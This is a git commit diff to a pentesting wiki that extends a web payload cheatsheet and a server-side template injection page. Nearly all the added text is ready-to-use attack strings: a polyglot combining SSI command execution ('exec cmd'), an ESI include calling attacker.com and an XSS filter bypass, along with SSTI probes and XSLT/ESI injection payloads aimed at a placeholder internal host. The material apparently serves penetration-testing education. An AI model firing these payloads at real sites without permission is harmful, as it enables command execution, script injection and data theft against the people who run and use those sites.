GitBook: [master] 2 pages modified

2021-06-25 20:23:31 +00:00 · 2021-06-25 20:23:31 +00:00 · f6fc033f1e
commit f6fc033f1e
parent 5430e6a46e
2 changed files with 42 additions and 0 deletions
--- a/pentesting-web/pocs-and-polygloths-cheatsheet.md
+++ b/pentesting-web/pocs-and-polygloths-cheatsheet.md
@ -104,3 +104,43 @@ javascript:alert(1)
 x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
 ```
 ### Polygloths
 ```markup
 <!--#echo var="DATE_LOCAL" --><!--#exec cmd="ls" --><esi:include src=http://attacker.com/>x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
 ```
 ## [Server Side Template Injection](ssti-server-side-template-injection/)
 ### Basic Tests
 ```markup
 ${{<%[%'"}}%\
 {{7*7}}
 ${7*7}
 <%= 7*7 %>
 ${{7*7}}
 #{7*7}
 ```
 ### Polygloths
 ```python
 {{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%\
 ```
 ## [XSLT Server Side Injection](xslt-server-side-injection-extensible-stylesheet-languaje-transformations.md)
 ### Basic Tests
 ```markup
 <xsl:value-of select="system-property('xsl:version')" />
 <esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
 ```
 ### Polygloths
 ```markup
 <xsl:value-of select="system-property('xsl:version')" /><esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
 ```
--- a/pentesting-web/ssti-server-side-template-injection/README.md
+++ b/pentesting-web/ssti-server-side-template-injection/README.md
@ -38,6 +38,8 @@ The given input is being **rendered and reflected** into the response. This is e
 {{7*7}}
 ${7*7}
 <%= 7*7 %>
 ${{7*7}}
 #{7*7}
 ```
 #### Detect - Code context